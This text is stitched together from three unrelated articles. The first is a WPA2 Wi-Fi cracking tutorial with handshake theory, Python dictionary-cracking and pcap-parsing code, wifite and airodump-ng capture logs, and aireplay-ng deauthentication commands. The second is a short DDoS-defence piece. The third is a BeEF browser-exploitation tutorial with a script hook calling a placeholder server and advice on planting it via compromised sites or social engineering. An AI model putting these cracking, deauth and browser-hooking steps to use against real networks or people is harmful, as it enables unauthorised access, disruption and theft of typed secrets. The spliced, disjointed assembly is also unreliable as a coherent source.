The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key); in the PSK case the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is derived from the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. These are concatenated (lower MAC first, lower nonce first) and put through a pseudo-random function (PRF-512, built on HMAC-SHA1) keyed with the PMK. PBKDF2 is not involved at this step; it is only used once, to turn the passphrase into the PMK.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are explained below:

  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) – AP uses this key to encrypt additional data sent (in the ‘Key Data’ field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data. With CCMP (what WPA2 normally uses, and what airodump-ng reports as CIPHER CCMP below) the PTK is only 48 bytes: KCK, KEK and TK. For cracking purposes only the KCK matters, because it is the key under which the handshake's MIC is computed.

 By the way, if you didn’t understand much of it then don’t worry. There’s a reason why people don’t  search for hacking tutorials on Wikipedia (half the stuff goes above the head)
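To make the two-step derivation above concrete, here is an added example (not code from the original post) that implements exactly what a cracker does per guess: PBKDF2 from passphrase and SSID to the PMK, PRF-512 from PMK, MACs and nonces to the PTK, and an HMAC over message 2 of the handshake using the KCK. The AP MAC is the one from this post; the client MAC, nonces and candidate list are constructed for the example, and the "captured" message 2 is generated here from a known passphrase so the whole thing runs offline. The PMK check at the bottom uses the "password"/"IEEE" test vector from IEEE 802.11i Annex H.

```python
import hashlib
import hmac
import struct

# Added example; the MACs/nonces below are constructed, except the AP MAC
# taken from the post. Only the WPA/WPA2-PSK (HMAC-SHA1 based) AKM is handled.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA1 output >= 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay (8)
# + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal message 2: descriptor type 2, key info 0x010A (version 2, pairwise, MIC set)."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1) + snonce + b"\x00" * 32 + mic + b"\x00\x00"
    return struct.pack(">BBH", 1, 3, len(body)) + body


def check_passphrase(passphrase, ssid, aa, spa, anonce, snonce, eapol_m2) -> bool:
    """One cracker iteration: derive PMK -> PTK -> KCK and compare the recomputed MIC."""
    kck = prf_512(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    version = struct.unpack(">H", eapol_m2[5:7])[0] & 0x7
    return hmac.compare_digest(eapol_mic(kck, eapol_m2, version),
                               eapol_m2[MIC_OFFSET:MIC_OFFSET + 16])


def crack(candidates, ssid, aa, spa, anonce, snonce, eapol_m2):
    """Return the first candidate whose MIC matches, or None (a plain dictionary attack)."""
    for cand in candidates:
        if check_passphrase(cand, ssid, aa, spa, anonce, snonce, eapol_m2):
            return cand
    return None


SSID = "me"
AA = bytes.fromhex("02738d37a7ed")       # AP MAC from the post
SPA = bytes.fromhex("0011223344cc")      # constructed client MAC
ANONCE = bytes(range(32))                # constructed nonces
SNONCE = bytes(range(32, 64))


def make_capture(true_passphrase: str) -> bytes:
    """Simulate the message 2 a client would have sent under the given passphrase."""
    kck = prf_512(pmk_from_passphrase(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_eapol_m2(SNONCE, eapol_mic(kck, build_eapol_m2(SNONCE), 2))


if __name__ == "__main__":
    m2 = make_capture("correct horse")
    print(crack(["12345678", "password", "correct horse"], SSID, AA, SPA, ANONCE, SNONCE, m2))
```

Note where the cost sits: prf_512 and the MIC are four or five HMACs, but pmk_from_passphrase is 4096 PBKDF2 iterations per guess, which is why GPU crackers and precomputed PMK tables (per SSID, since the SSID is the salt) exist.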

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We’ll look at them one by one-

  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)



We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. There are 2 options: you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake.

Now while other tutorials don't mention this, I will (such a good guy I am 🙂 ). Your network card is good at receiving packets, but not as good at transmitting them. If your clients are far from you, your deauth frames (i.e. "please get off this connection" requests, which are unauthenticated in WPA2 and so can be spoofed) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other attacks too). So the idea is to be as close to the access point (router) and the clients as possible.

The methodology is the same for the wifite and airodump-ng methods, but wifite does all this for you, whereas with airodump-ng you'll have to call a brethren (aireplay-ng) to your rescue. Okay, enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named ‘me’ protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'

[+] scanning for wireless devices…
[+] enabling monitor mode on wlan0… done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******               11  WEP   21db    no   client
    3  **************        11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack. The network has WPS enabled, which is an added bonus: reaver can save you all the trouble, and wifite will use reaver to skip the whole WPA cracking process and exploit the WPS PIN weakness instead. We have a tutorial on hacking WPA WPS using Reaver already; in this tutorial we'll forget that this network has WPS and capture the handshake instead.
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the WPS PIN guessing attack. Against an AP that doesn't lock out after failed PINs this has a very high success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it moved on to capturing the handshake. I waited for 10-20 secs, and then pressed ctrl+c. No client was there, so no handshake could be captured. Here's what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:08:05] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0… done
[+] quitting

Now I connected my other PC to ‘me’. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it’ll try to connect again. Lets see what happens this time around.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *                      1  WPA   99db    no   client
    2  me                     1  WPA2  47db   wps   client
    3  *                     11  WEP   22db    no   clients
    4  *                     11  WEP   20db    no

[+] select target numbers (1-4) separated by commas, or ‘all’: 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:51] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting

Now the deauth attacks weren't working. This time I increased the deauth frequency (-wpadt is the time in seconds between deauths; 1 instead of the default 10).
root@kali:~# wifite -wpadt 1
Soon, however, I realized that the real problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so the deauth frames were never actually transmitted. So, time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'

[+] scanning for wireless devices…
[+] available wireless devices:
1. wlan1        Ralink RT2870/3070    rt2800usb – [phy1]
2. wlan0        Atheros     ath9k – [phy0]
[+] select number of device to put into monitor mode (1-2):

See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                     11  WEP   16db    no   client
    3  *                     11  WEP   16db    no

[+] select target numbers (1-3) separated by commas, or ‘all’:
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:23] listening for handshake…
[0:00:57] handshake captured! saved as “hs/me_02-73-8D-**-**-**.cap”
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap

[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0… done
[+] quitting

As you can see, it took 57 seconds to capture the handshake (5 deauth bursts were sent; one every 10 secs is the default). The "no WPA dictionary found" message shouldn't bother you; we'll use wifite only to capture the handshake. The captured handshake was saved as a .cap file which can be cracked with aircrack-ng, pyrit, or hashcat (after converting it to .hccap for the old -m 2500 mode; current hashcat versions expect the 22000 format produced by hcxpcapngtool instead) using either a wordlist or brute force. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into; it'll be a perfect ride, since all the problems were already seen in the wifite case.

Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite part was quite detailed. I'm copying stuff from where I already discussed airodump-ng. (If you are not a newbie, skip to the part marked "Non newbies".)

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo – loopback. Not important currently.
  • eth – ethernet
  • wlan – This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up? This is usually because a virtual machine does not see the host's internal wireless card as a wireless device (it gets a virtual wired adapter instead). You should try booting Kali from a Live USB (just look at the first part of this tutorial), or use an external USB card passed through to the VM.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0


4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 --write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

Now copy the BSSID field of your target network (from the airodump-ng screen) and launch a deauth attack with aireplay-ng

root@kali:~# aireplay-ng --deauth 0 -a BSSID_here mon0

The --deauth tells aireplay-ng to launch a deauth attack. The number after it is how many deauth bursts to send; 0 means keep sending until you stop it, so run it only for a few secs and press ctrl+c (a small count such as --deauth 5 is usually enough and is less disruptive to everyone else on the network). -a takes the target BSSID, so replace BSSID_here with your target's BSSID; add -c followed by a client's MAC to deauth one specific station instead of broadcasting to all of them. mon0 is the interface you created.
In case you face problems with the monitor interface hopping from one channel to another, or a complaint about beacon frames, then fix mon0 on a channel (and, optionally, restrict the capture to your target) using
root@kali:~# airodump-ng mon0 -w anynamehere -c 1 --bssid BSSID_here
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay-ng demands it. In my case airodump-ng says "fixed channel mon0: -1", so this was required. (It's a bug with the aircrack-ng suite.)

Now when you look at the airodump-ng screen, you'll see that at the top right it says "WPA handshake:" followed by the BSSID. Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

*                     *                            0    0e- 1    742       82  me
*                       *                           -35  0e- 1      0   26

You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
#  BSSID              ESSID                     Encryption
1  **************  me                        WPA (1 handshake)
2  **                          Unknown
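aircrack-ng's "(1 handshake)" only tells you it found something it can try; it does not tell you which of the four EAPOL messages you got or whether they belong to the same exchange (a message 1 from one association and a message 2 from a later one will not crack, because the ANonce is wrong). The following is an added example, not code from the original post, that walks a .cap file and reports the EAPOL-Key messages per AP/client pair together with their replay counters. It assumes the classic pcap format with linktype 105 (802.11 frames without a radiotap header), which is what airodump-ng writes by default; the AP MAC is the one from this post, and the sample capture at the bottom is constructed in the script rather than recorded.

```python
import struct
from collections import defaultdict

# Added example. Only linktype 105 and little-endian classic pcap are handled;
# run `file anynamehere-01.cap` to confirm before pointing it at a real capture.
LINKTYPE_IEEE802_11 = 105
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header for EtherType 0x888e


def read_pcap(data: bytes):
    """Yield the packet bytes of every record in a little-endian classic pcap."""
    if struct.unpack("<I", data[:4])[0] != 0xA1B2C3D4:
        raise ValueError("expected a little-endian classic pcap (pcapng is not handled here)")
    linktype = struct.unpack("<I", data[20:24])[0]
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"linktype {linktype}: this example only parses linktype 105")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack("<I", data[off + 8:off + 12])[0]
        yield data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len


def eapol_key(frame: bytes):
    """Return (src, dst, eapol_bytes) if this 802.11 data frame carries EAPOL-Key, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 3 != 2:          # frame type 2 = data
        return None
    to_ds, from_ds = frame[1] & 1, (frame[1] >> 1) & 1
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if frame[0] & 0x80 else 0)  # addr4, QoS ctl
    src = frame[24:30] if to_ds and from_ds else (a3 if from_ds else a2)
    dst = a3 if to_ds else a1
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL or frame[hdr + 9] != 3:  # EAPOL type 3 = Key
        return None
    return src, dst, frame[hdr + 8:]


def classify(eapol: bytes) -> str:
    """Map an EAPOL-Key frame to M1..M4 from the Key Info flags (Install, ACK, MIC, Secure)."""
    key_info = struct.unpack(">H", eapol[5:7])[0]
    install, ack, mic, secure = (key_info >> 6) & 1, (key_info >> 7) & 1, (key_info >> 8) & 1, (key_info >> 9) & 1
    if ack and not mic:
        return "M1"
    if ack and mic and install:
        return "M3"
    if mic and not ack:
        return "M4" if secure or eapol[17:49] == b"\x00" * 32 else "M2"
    return "?"


def handshake_summary(pcap_bytes: bytes) -> dict:
    """{(ap, sta): [(label, replay_counter), ...]} for every EAPOL-Key frame in the capture."""
    pairs = defaultdict(list)
    for frame in read_pcap(pcap_bytes):
        hit = eapol_key(frame)
        if hit is None:
            continue
        src, dst, eapol = hit
        label = classify(eapol)
        replay = struct.unpack(">Q", eapol[9:17])[0]
        ap, sta = (src, dst) if label in ("M1", "M3") else (dst, src)
        pairs[(ap.hex(":"), sta.hex(":"))].append((label, replay))
    return dict(pairs)


def usable(messages) -> bool:
    """Crackable: an M2 plus the M1 with the same replay counter, or the M3 that follows it
    (the AP increments the counter for M3), so the ANonce really belongs to this exchange."""
    m1 = [r for l, r in messages if l == "M1"]
    m3 = [r for l, r in messages if l == "M3"]
    return any(r in m1 or r + 1 in m3 for l, r in messages if l == "M2")


# --- constructed sample capture (M1 from the AP, M2 from the client) ---
AP = bytes.fromhex("02738d37a7ed")      # AP MAC from the post
STA = bytes.fromhex("0011223344cc")     # constructed client MAC


def eapol_key_frame(key_info: int, replay: int, nonce: bytes) -> bytes:
    body = struct.pack(">BHHQ", 2, key_info, 16, replay) + nonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00"
    return struct.pack(">BBH", 1, 3, len(body)) + body


def data_frame(src: bytes, dst: bytes, bssid: bytes, from_ds: bool, payload: bytes) -> bytes:
    """Non-QoS data frame: AP->STA sets FromDS (addr3 = SA); STA->AP sets ToDS (addr3 = DA)."""
    addrs = (dst + bssid + src) if from_ds else (bssid + src + dst)
    return bytes([0x08, 0x02 if from_ds else 0x01]) + b"\x00\x00" + addrs + b"\x00\x00" + LLC_SNAP_EAPOL + payload


def pcap(frames) -> bytes:
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11))
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1400000000 + i, 0, len(f), len(f)) + f
    return bytes(out)


def sample_capture() -> bytes:
    m1 = data_frame(AP, STA, AP, True, eapol_key_frame(0x008A, 5, bytes(range(32))))       # ACK
    m2 = data_frame(STA, AP, AP, False, eapol_key_frame(0x010A, 5, bytes(range(32, 64))))  # MIC
    return pcap([m1, m2])


if __name__ == "__main__":
    for pair, msgs in handshake_summary(sample_capture()).items():
        print(pair, msgs, "usable" if usable(msgs) else "incomplete")
```

To run it on a real file, replace sample_capture() with open("anynamehere-01.cap", "rb").read(). If you only ever see M1 for your target, the deauth is reaching the client but its reply isn't reaching you (move closer); if you see M2 and M4 but their counters never line up with an M1 or M3, you are catching the client's side of a different association than the AP's side.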


The last thing an administrator wants to deal with is a Distributed Denial of Service (DDoS) attack. Yet, together with the recent rise of hacktivism, DDoS attacks are increasingly becoming a threat that IT admins need to be prepared for.

Just recently, the CIA’s main website was allegedly brought down by a DDoS attack launched by Anonymous. DDoS attacks work by essentially leveraging the power of hijacked computer systems (through the use of botnets, for example) to send a huge amount of traffic to a single designated target. This simple concept can be frighteningly effective in bringing down huge sites.

The worst thing about DDoS attacks is that most of them do not exploit a vulnerability in the victim's software at all; they simply exhaust bandwidth or server capacity. So being cautious and using the right tools and protection, which works against ordinary hacking attacks, is not enough on its own.

Despite the threat, there's still an effective way to protect your network against these attacks: network design decisions. A DDoS is nothing more than a never-ending stream of requests from a large number of sources. The way to protect against it is to have a system that identifies the attack traffic and blocks or rate-limits it as far upstream as possible.

This is easier said than done. Identifying the source of a DDoS attack can be tricky and, in most cases, involves tweaking an intrusion detection system (IDS) to differentiate between legitimate requests and attacks. Testing its effectiveness is not easy either. In any case, this will cause quite a few false positives.

Once an attack source is identified, you configure the firewall to block that source until the attack stops. Even so, if your Internet uplink is saturated, blocking at your own firewall doesn't help much: the packets have already consumed the bandwidth by the time they reach it, and your site will still probably be inaccessible.

And it doesn't end here; if you're the target of a DDoS attack, the next problem to deal with is your Internet Service Provider (ISP). If the attack is large enough, the ISP may opt to null-route your address to save bandwidth and avoid degrading performance for other customers. In this case, the consequences may be worse than the actual impact of the DDoS attack itself, as your downtime is likely to be longer. For this reason, you may want to check what your ISP's policies on DDoS attacks are before signing up for the service.

Ironically, the ISP also happens to be your best ally in the event of a DDoS attack since their infrastructure is most likely to have the capability to handle the huge amount of traffic if the Firewall is hosted on their systems rather than at your end. This is also something you might want to explore with the ISP.

Defending against a DDoS attack is possible mostly through design choices, and having an infrastructure in place that can help mitigate the damage should you be the target of a DDoS attack.


BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.

In this post, I’ll show you the quickest way to get up and running with BeEF using BackTrack or Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.

In this guide I'll be using Kali Linux, the penetration testing distribution created by the folks at Offensive Security. You can download an ISO or a VMware image. The steps will also work for BackTrack, the previous incarnation of the distribution. For installation steps on other systems, check out the BeEF Wiki.

Installation on Kali is very simple. Since they’ve created a nice package we can simply use apt-get to install it. Just to make sure we’ve got the most recent version, we’ll update our package list first.

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

(Be sure you get beef-xss and not beef. The latter is a programming language interpreter.)

Since we're depending on a package from the Kali maintainers, this method may not always get the most up-to-date version of BeEF. At the time of this post the package provides the current release. If you need a feature that isn't yet available in the Kali package then you'll need to follow the directions on the BeEF website to download and install it manually.

Once the install is finished, we can change to its directory and launch BeEF:

root@kali:/# cd /usr/share/beef-xss
root@kali:/usr/share/beef-xss# ./beef

The startup output tells us that BeEF is running on two different interfaces, locally and on the internal network, both on port 3000. It also prints the link for the "hook" and the link for the user interface control panel. All of these settings and more are customizable via the config.yaml file found in the program's root directory.

Now that BeEF is up and running, let's check out the control panel. Using a web browser we'll browse to the UI link printed above. You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The default user name and password are beef:beef. Since the panel is reachable from the whole network, change those credentials in config.yaml before using BeEF anywhere but an isolated lab; anyone who can log in controls every hooked browser.

Once logged in we’re greeted with a helpful Getting Started page that explains some of the additional options. But the most important point is in the first paragraph. Here we learn how to “hook” a browser. BeEF provides two example pages in order to test with.

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run in the client's browser. When it does, it calls back to the BeEF server, reporting a lot of information about the target, and it keeps polling so that additional commands and modules can be run against the target. The hook's URL is printed at startup alongside the UI URL.

In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it (replace BEEF_SERVER_IP with the address of your BeEF host, as shown in the hook URL at startup):

<script src="http://BEEF_SERVER_IP:3000/hook.js" type="text/javascript"></script>

In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.

For this demonstration, click the link beside “basic demo page here.” Once that page loads, go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

When you click on any machine on the left, you’ll see a lot more details and functionality. The screenshot below shows the Logs tab on the right. We can see that I typed “secret password” into the text box on the demo page. Notice that I didn’t submit the page, I just typed it in.

As an experiment, try clicking anywhere else on the demo page except for in the text box. Now type something like “abcdef.” Now go back to the BeEF Control Panel and click the Refresh button at the bottom of the Logs tab. You should notice a new event similar to this:

Now click on the Commands tab. You’ll find a wide range of commands and exploits that can be launched against your target. Try them out, but be patient; sometimes it takes awhile for commands to finish and report their results. The more you experiment with each command, the more you’ll know how reliable it is and how best to use it. In addition to the exploits listed, BeEF can also be integrated with Metasploit in order to launch a wider range of exploits against the host system. That’ll be another blog post.

Notice that some of the commands have different colored icons. If you click back to the Getting Started tab, there’s an explanation of what each of the colors represent.

Now that you’re up and running there’s a lot more that you can do with BeEF. Experiment with the different options in your lab so that you’ll be ready to go when the opportunity presents itself during an engagement.